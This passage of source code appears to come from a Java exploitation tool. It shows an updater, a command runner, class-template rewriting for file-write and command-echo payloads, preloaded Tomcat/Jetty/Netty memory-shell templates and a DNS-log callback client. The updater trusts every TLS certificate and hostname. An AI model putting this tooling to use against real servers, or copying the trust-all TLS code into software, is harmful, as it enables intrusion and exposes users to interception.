path.substring(1); 40 | String localname =path.substring(path.lastIndexOf("/")+1); 41 | path = path.substring(0,path.lastIndexOf("/")); 42 | 43 | if (System.getProperties().getProperty("os.name").toLowerCase().contains("mac os")){ 44 | path = "/" + path; 45 | } 46 | path = java.net.URLDecoder.decode(path,"UTF-8"); 47 | WriteLogBase("\n[*] 下载地址 "+path); 48 | WriteLogBase("\n[*] 远程地址 "+url); 49 | String filename =url.substring(url.lastIndexOf("/")+1); 50 | if (localname.equals(filename)){ 51 | WriteLogBase("\n[*]已经是最新版本了 无需更新"); 52 | return; 53 | } 54 | 55 | if (download(url,path,filename)){ 56 | WriteLogBase("\n[*]更新成功"); 57 | }else { 58 | WriteLogBase("\n[*]更新失败 :( 请手动下载"); 59 | 60 | } 61 | System.out.println(url); 62 | //String path = System.getProperty("java.io.tmpdir") + filename; 63 | //= path.substring(1); 64 | 65 | }catch (Exception e){ 66 | WriteLogBase("\n[*]下载失败"+"\n"+e.toString()); 67 | return; 68 | } 69 | } 70 | public static String runCmd(String cmd) { 71 | 72 | //WriteLogBase("\n" + cmd); 73 | 74 | String result=""; 75 | try { 76 | Process ps = Runtime.getRuntime().exec(cmd); 77 | BufferedReader br = new BufferedReader(new InputStreamReader(ps.getInputStream(), Charset.forName("GBK"))); 78 | String line = null; 79 | while ((line = br.readLine()) != null) { 80 | // WriteLogBase(line); 81 | System.out.println(line); 82 | result+=line+"\n"; 83 | } 84 | br.close(); 85 | System.out.println("close ... "); 86 | ps.waitFor(); 87 | System.out.println("wait over ..."); 88 | return result; 89 | } catch (IOException ioe) { 90 | ioe.printStackTrace(); 91 | } catch (InterruptedException e) { 92 | 93 | // TODO Auto-generated catch block 94 | e.printStackTrace(); 95 | 96 | } 97 | System.out.println("child thread donn"); 98 | return null; 99 | } 100 | 101 | 102 | public static void main(String[] args) throws Exception { 103 | String url = "https://github.com/zhaoyumi/MYExploit/releases/download/v2.0.5/MYExploit-2.0.5-SNAPSHOT.jar"; 104 | System.out.println(url.substring(url.lastIndexOf("/")+1)); 105 | download("https://github.com/zhaoyumi/MYExploit/releases/download/v2.0.5/MYExploit-2.0.5-SNAPSHOT.jar","C:\\Users\\Chun\\Desktop\\MYExploit","MYExploit-1.0-SNAPSHOT.jar"); 106 | } 107 | public static boolean download(String urlPath , String targetDirectory,String fileName) throws Exception { 108 | // 解决url中可能有中文情况 109 | URL url = new URL(urlPath); 110 | WriteLogBase("\n[*]下载中.............请等待。"); 111 | HttpsURLConnection http = (HttpsURLConnection)url.openConnection(); 112 | http.setConnectTimeout(8000); 113 | TrustManager[] trustManagers = {new HttpsTrustManager()}; 114 | SSLContext context = SSLContext.getInstance("TLS"); 115 | context.init(null, trustManagers, new SecureRandom()); 116 | http.setSSLSocketFactory(context.getSocketFactory()); 117 | http.setHostnameVerifier(new HostnameVerifier() { 118 | @Override 119 | public boolean verify(String hostname, SSLSession session) { 120 | return true; 121 | } 122 | }); 123 | // 设置 User-Agent 避免被拦截 124 | http.setRequestProperty("User-Agent", "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"); 125 | String contentType = http.getContentType(); 126 | // 获取文件大小 127 | long length = http.getContentLengthLong(); 128 | if (length<0){ 129 | WriteLogBase("\n[*] 下载链接时超时 :( "); 130 | } 131 | // 获取文件名 132 | InputStream inputStream = http.getInputStream(); 133 | int total = inputStream.available(); 134 | 135 | 136 | byte[] buff = new byte[1024*500]; 137 | 138 | File file = new File(targetDirectory, fileName); 139 | if(!file.exists()){ 140 | OutputStream out = new FileOutputStream(file); 141 | int len ; 142 | int count = 0; // 计数 143 | while((len = inputStream.read(buff)) != -1) { 144 | out.write(buff, 0, len); 145 | out.flush(); 146 | ++count ; 147 | } 148 | // 关闭资源 149 | out.close(); 150 | inputStream.close(); 151 | http.disconnect(); 152 | WriteLogBase("\n[*] Success :)"); 153 | return true; 154 | }else{ 155 | WriteLogBase("\n[*] 下载路径下存在同名文件 :("); 156 | } 157 | return false; 158 | } 159 | 160 | } 161 | class HttpsTrustManager implements X509TrustManager { 162 | 163 | private static TrustManager[] trustManagers = {new HttpsTrustManager()}; 164 | 165 | @Override 166 | public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException { 167 | // TODO Auto-generated method stub 168 | 169 | } 170 | 171 | @Override 172 | public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException { 173 | // TODO Auto-generated method stub 174 | 175 | } 176 | 177 | @Override 178 | public X509Certificate[] getAcceptedIssuers() { 179 | // TODO Auto-generated method stub 180 | return null; 181 | } 182 | 183 | public static void allowAllSSL() { 184 | try { 185 | SSLContext context = SSLContext.getInstance("TLS"); 186 | context.init(null, trustManagers, new SecureRandom()); 187 | HttpsURLConnection.setDefaultSSLSocketFactory(context.getSocketFactory()); 188 | HttpsURLConnection.setDefaultHostnameVerifier(new HostnameVerifier() { 189 | @Override 190 | public boolean verify(String hostname, SSLSession session) { 191 | return true; 192 | } 193 | }); 194 | } catch (Exception e) { 195 | e.printStackTrace(); 196 | } 197 | } 198 | 199 | } 200 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Utils/AESEncodeMain.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Utils; 2 | 3 | import javax.crypto.Cipher; 4 | import javax.crypto.KeyGenerator; 5 | import javax.crypto.SecretKey; 6 | import javax.crypto.spec.SecretKeySpec; 7 | import java.security.NoSuchAlgorithmException; 8 | import java.security.SecureRandom; 9 | 10 | public class AESEncodeMain { 11 | 12 | public static byte[] initSecretKey(String code) { 13 | KeyGenerator kg = null; 14 | 15 | try { 16 | kg = KeyGenerator.getInstance("AES"); 17 | SecureRandom secureRandom = SecureRandom.getInstance("SHA1PRNG"); 18 | secureRandom.setSeed(code.getBytes()); 19 | kg.init(128, secureRandom); 20 | } catch (NoSuchAlgorithmException var3) { 21 | var3.printStackTrace(); 22 | return new byte[0]; 23 | } 24 | 25 | SecretKey secretKey = kg.generateKey(); 26 | return secretKey.getEncoded(); 27 | } 28 | 29 | public static String encrypt(String sSrc, String sKey) throws Exception { 30 | byte[] raw = initSecretKey(sKey); 31 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES"); 32 | Cipher cipher = Cipher.getInstance("AES"); 33 | cipher.init(1, skeySpec); 34 | byte[] encrypted = cipher.doFinal(sSrc.getBytes()); 35 | return byte2hex(encrypted).toLowerCase(); 36 | } 37 | 38 | public static String byte2hex(byte[] byteArray) { 39 | StringBuilder sb = new StringBuilder(); 40 | byte[] var2 = byteArray; 41 | int var3 = byteArray.length; 42 | 43 | for(int var4 = 0; var4 < var3; ++var4) { 44 | byte b = var2[var4]; 45 | String hex = Integer.toHexString(b & 255); 46 | if (hex.length() == 1) { 47 | sb.append('0'); 48 | } 49 | 50 | sb.append(hex); 51 | } 52 | 53 | return sb.toString().toUpperCase(); 54 | } 55 | 56 | } 57 | 58 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Utils/ASMChanger.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Utils; 2 | 3 | 4 | import org.apache.commons.lang3.StringUtils; 5 | import org.objectweb.asm.ClassVisitor; 6 | import org.objectweb.asm.FieldVisitor; 7 | import org.objectweb.asm.MethodVisitor; 8 | import com.achuna33.SupportType.MyDIYType; 9 | 10 | 11 | import static org.objectweb.asm.Opcodes.ASM6; 12 | 13 | public class ASMChanger { 14 | 15 | public static class ModifyAccessVisitor extends ClassVisitor { 16 | public String Classname; 17 | private String Path; 18 | private String Content; 19 | private MyDIYType Template2Int; 20 | 21 | public ModifyAccessVisitor(int i, ClassVisitor classVisitor, MyDIYType Template2Int, String ClassName, String Path, String Content) { 22 | super(i, classVisitor); 23 | Classname = ClassName; 24 | this.Path = Path; 25 | this.Content = Content; 26 | this.Template2Int = Template2Int; 27 | } 28 | 29 | @Override 30 | public FieldVisitor visitField(int access, String name, String descriptor, String signature, Object value) { 31 | switch(Template2Int){ 32 | case PutFile: 33 | if (StringUtils.equals(name,"Contentbase64")) 34 | return super.visitField(access, name, descriptor, signature, Content); 35 | if (StringUtils.equals(name,"Path")) 36 | return super.visitField(access, name, descriptor, signature, Path); 37 | break; 38 | case commandecho: 39 | if (StringUtils.equals(name,"cmd")) 40 | return super.visitField(access, name, descriptor, signature, Content); 41 | if (StringUtils.equals(name,"uri")) 42 | return super.visitField(access, name, descriptor, signature, Path); 43 | break; 44 | } 45 | return super.visitField(access, name, descriptor, signature, value); 46 | } 47 | @Override 48 | public MethodVisitor visitMethod(int access, String name, String descriptor, String signature, String[] exceptions) { 49 | if (Classname.equals("")){ 50 | return super.visitMethod(access,name,descriptor,signature,exceptions); 51 | } 52 | MyMethodVisitor mv2 = new MyMethodVisitor(ASM6,super.visitMethod(access,name,descriptor,signature,exceptions),Classname); 53 | return mv2; 54 | } 55 | @Override 56 | public void visitInnerClass(String name, String outerName, String innerName, int access) { 57 | super.visitInnerClass(name,outerName,innerName,access); 58 | } 59 | @Override 60 | public void visit(int version, int access, String name, String signature, String superName, String[] interfaces) { 61 | if (Classname.equals("")){ 62 | super.visit(version,access,name,signature,superName,interfaces); 63 | }else { 64 | //Change Class Name 65 | super.visit(version,access,Classname,signature,superName,interfaces); 66 | } 67 | 68 | } 69 | } 70 | public static class MyMethodVisitor extends MethodVisitor { 71 | private String Classname; 72 | public MyMethodVisitor(int i, MethodVisitor methodVisitor,String Classname) { 73 | super(i, methodVisitor); 74 | this.Classname = Classname; 75 | } 76 | @Override 77 | public void visitFieldInsn(int opcode, String owner, String name, String descriptor) { 78 | super.visitFieldInsn(opcode,Classname,name,descriptor); 79 | } 80 | } 81 | 82 | } 83 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Utils/Cache.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Utils; 2 | 3 | import java.lang.reflect.Constructor; 4 | import java.lang.reflect.InvocationTargetException; 5 | import java.lang.reflect.Method; 6 | import java.util.*; 7 | import java.util.concurrent.TimeUnit; 8 | 9 | import com.achuna33.Templates.*; 10 | import com.achuna33.Utils.Utils; 11 | import com.achuna33.Controllers.BasicController; 12 | import com.achuna33.Controllers.BasicMapping; 13 | import com.achuna33.Controllers.VulnerabilityDescriptionMapping; 14 | import com.achuna33.SupportType.SupportType; 15 | import com.achuna33.SupportType.SupportVul; 16 | import com.achuna33.UI.UIController; 17 | import javafx.application.Platform; 18 | import net.jodah.expiringmap.ExpiringMap; 19 | import org.apache.commons.collections4.map.PassiveExpiringMap; 20 | import org.reflections.Reflections; 21 | import org.reflections.scanners.MethodAnnotationsScanner; 22 | import net.jodah.expiringmap.ExpirationPolicy; 23 | public class Cache { 24 | public static TreeMap routes = new TreeMap(); // 路由map, 存储key+路由 25 | public static TreeMap> VulRoutes = new TreeMap>(); // 漏洞产品对用漏洞集合 26 | public static List SupprotType = new ArrayList(); // 支持的产品 用于前端展示 27 | public static HashMap> VulDescriptions = new HashMap>(); // 用于存储漏洞名称+map(漏洞描述,漏洞类型) 28 | public static UIController uiController; 29 | public static HashMap ThreadIdForLog = new HashMap<>(); 30 | 31 | 32 | private static ExpiringMap map = ExpiringMap.builder() 33 | .maxSize(1000) 34 | .expiration(30, TimeUnit.SECONDS) 35 | .variableExpiration() 36 | .expirationPolicy(ExpirationPolicy.CREATED) 37 | .build(); 38 | 39 | static{ 40 | try { 41 | //过期时间100年,永不过期的简单方法 42 | map.put("TomcatEchoTemplate", Utils.getClassBytes(TomcatEchoTemplate.class), 365 * 100, TimeUnit.DAYS); 43 | map.put("TomcatMemshellTemplate1", Utils.getClassBytes(TomcatMemshellTemplate1.class), 365 * 100, TimeUnit.DAYS); 44 | map.put("TomcatMemshellTemplate2", Utils.getClassBytes(TomcatMemshellTemplate2.class), 365 * 100, TimeUnit.DAYS); 45 | map.put("JettyMemshellTemplate", Utils.getClassBytes(JettyMemshellTemplate.class), 365 * 100, TimeUnit.DAYS); 46 | map.put("NettyMemshellTemplate", Utils.getClassBytes(NettyMemshellTemplate.class), 365 * 100, TimeUnit.DAYS); 47 | 48 | } catch (Exception e) { 49 | e.printStackTrace(); 50 | } 51 | } 52 | 53 | public static void InitSupportType(UIController obj) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException { 54 | uiController = obj; 55 | Set> controllers = new Reflections(BasicController.class.getPackage().getName()) 56 | .getTypesAnnotatedWith(BasicMapping.class); 57 | for(Class controller : controllers) { 58 | Constructor cons = controller.getConstructor(); 59 | BasicController instance = (BasicController) cons.newInstance(); 60 | String mapping = controller.getAnnotation(BasicMapping.class).uri(); 61 | routes.put(mapping, instance); 62 | System.out.println(mapping); 63 | SupprotType.add(mapping); //# 加入类对应的产品名称 64 | Set methods = new Reflections(controller.getPackage().getName()+"."+controller.getSimpleName(),new MethodAnnotationsScanner()).getMethodsAnnotatedWith(VulnerabilityDescriptionMapping.class); 65 | 66 | List list = new ArrayList(); 67 | for (Method method : methods){ 68 | System.out.println(method.getClass()); 69 | if (method.getName().startsWith("vul_")){ 70 | list.add(method); 71 | HashMap hashMap =new HashMap(); 72 | hashMap.put(method.getAnnotation(VulnerabilityDescriptionMapping.class).Description(), 73 | method.getAnnotation(VulnerabilityDescriptionMapping.class).SupportVulType()); 74 | VulDescriptions.put(method.getName(),hashMap); 75 | } 76 | } 77 | VulRoutes.put(mapping,list); 78 | } 79 | } 80 | public static List getVulRoutesValue(String key){ 81 | return VulRoutes.get(key); 82 | } 83 | public static HashMap getVulDescriptions(String key){ 84 | 85 | return VulDescriptions.get(key); 86 | } 87 | public static void WriteLogBase(String text){ 88 | Platform.runLater(() -> { 89 | Cache.uiController.logTextArea.appendText(text); 90 | }); 91 | } 92 | public static void set(String key,byte[] value){ 93 | map.put(key,value); 94 | } 95 | public static byte[] get(String key){ 96 | return map.get(key); 97 | } 98 | public static void main(String[] args) throws InvocationTargetException, NoSuchMethodException, InstantiationException, IllegalAccessException { 99 | 100 | 101 | } 102 | } 103 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Utils/DNSLOG.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Utils; 2 | 3 | import com.achuna33.Gadgets.utils.Util; 4 | import com.alibaba.fastjson.JSON; 5 | import com.alibaba.fastjson.JSONObject; 6 | 7 | import java.net.MalformedURLException; 8 | 9 | 10 | /* 11 | * 会初始化可以token ,这个token 在 result 不为空时刷新。 12 | * 13 | * */ 14 | public class DNSLOG { 15 | public static String DnslogDomain = "https://dig.pm"; 16 | public static String domain=""; 17 | public static String token = ""; 18 | public static String result = ""; 19 | public DNSLOG(){} 20 | /* 21 | * 获取结果 22 | * */ 23 | public static Response getDnslogResult() throws MalformedURLException { 24 | String data = "token="+token; 25 | Response response = new HttpRequest("https://dig.pm/get_results").Post(data); 26 | System.out.println(response.statusCode); 27 | System.out.println(response.responseBody); 28 | return response; 29 | } 30 | /* 31 | * 获取新的 域名 32 | * */ 33 | public static Response getDnslogDomain() throws MalformedURLException { 34 | String data = "domain=dns.1433.eu.org."; 35 | Response response = new HttpRequest("https://dig.pm/new_gen").Post(data); 36 | JSONObject json = (JSONObject) JSON.parse(response.responseBody); 37 | token = json.getString("token"); 38 | domain = json.getString("domain"); 39 | System.out.println(response.statusCode); 40 | System.out.println(response.responseBody); 41 | return response; 42 | } 43 | public static String getRandomDomain(){ 44 | return Utils.getRandomString(4) +"."+domain; 45 | } 46 | public static void setDomain(String value){ 47 | domain = value; 48 | } 49 | 50 | public static void main(String[] args) throws MalformedURLException { 51 | 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Utils/Intruder.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Utils; 2 | 3 | import java.lang.reflect.InvocationTargetException; 4 | import java.lang.reflect.Method; 5 | import java.net.HttpURLConnection; 6 | import java.net.MalformedURLException; 7 | 8 | import static com.achuna33.Utils.Cache.WriteLogBase; 9 | 10 | public class Intruder extends Thread{ 11 | public String method; 12 | public String target; 13 | public String args = ""; 14 | 15 | public void setMethod(String method) { 16 | this.method = method; 17 | } 18 | public void setTarget(String target){ 19 | this.target = target; 20 | } 21 | public void setArgs(String args){ 22 | this.args = args; 23 | } 24 | @Override 25 | public void run() { 26 | if (method.equals("GET")){ 27 | HttpRequest request = null; 28 | try { 29 | request = new HttpRequest(target); 30 | } catch (MalformedURLException e) { 31 | e.printStackTrace(); 32 | } 33 | Response result = request.Get(args); 34 | if (result.statusCode==200){ 35 | WriteLogBase("\n[*] 存在 "+ target); 36 | } 37 | }if (method.equals("POST")){ 38 | 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Utils/MyURLClassLoader.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Utils; 2 | 3 | import java.io.File; 4 | import java.lang.reflect.InvocationTargetException; 5 | import java.lang.reflect.Method; 6 | import java.net.MalformedURLException; 7 | import java.net.URL; 8 | import java.net.URLClassLoader; 9 | 10 | public class MyURLClassLoader { 11 | private URLClassLoader classLoader; 12 | 13 | public MyURLClassLoader(String jarName){ 14 | try{ 15 | classLoader = getURLClassLoader(jarName); 16 | }catch(MalformedURLException e){ 17 | e.printStackTrace(); 18 | } 19 | } 20 | 21 | public Class loadClass(String className) { 22 | try{ 23 | //由于我项目中已经有了 commons-beanutils:1.9.4,如果使用 loadClass 方法,加载的是项目 ClassPath 下的 commons-beanutils 24 | //为了避免这种情况,所以调用了 findClass 方法 25 | Method method = URLClassLoader.class.getDeclaredMethod("findClass", new Class[]{String.class}); 26 | method.setAccessible(true); 27 | Class clazz = (Class) method.invoke(this.classLoader, new Object[]{className}); 28 | return clazz; 29 | } catch (NoSuchMethodException e) { 30 | e.printStackTrace(); 31 | } catch (IllegalAccessException e) { 32 | e.printStackTrace(); 33 | } catch (InvocationTargetException e) { 34 | e.printStackTrace(); 35 | } 36 | 37 | return null; 38 | } 39 | 40 | 41 | private URLClassLoader getURLClassLoader(String jarName) throws MalformedURLException { 42 | String path = System.getProperty("user.dir") + File.separator + "lib" + File.separator + jarName; 43 | File file = new File(path); 44 | URL url = file.toURI().toURL(); 45 | URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{url}); 46 | return urlClassLoader; 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Utils/Response.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Utils; 2 | 3 | import java.util.List; 4 | import java.util.Map; 5 | 6 | public class Response { 7 | public int statusCode; 8 | public String responseBody ; 9 | public Map> responseHeader; 10 | public Map> requestHeader; 11 | public Response(int statusCode, String responseBody,Map> responseHeader){ 12 | this.statusCode = statusCode; 13 | this.responseBody = responseBody; 14 | this.responseHeader = responseHeader; 15 | } 16 | public void setRequestHeader(Map> map){ 17 | this.requestHeader = map; 18 | } 19 | 20 | } 21 | --------------------------------------------------------------------------------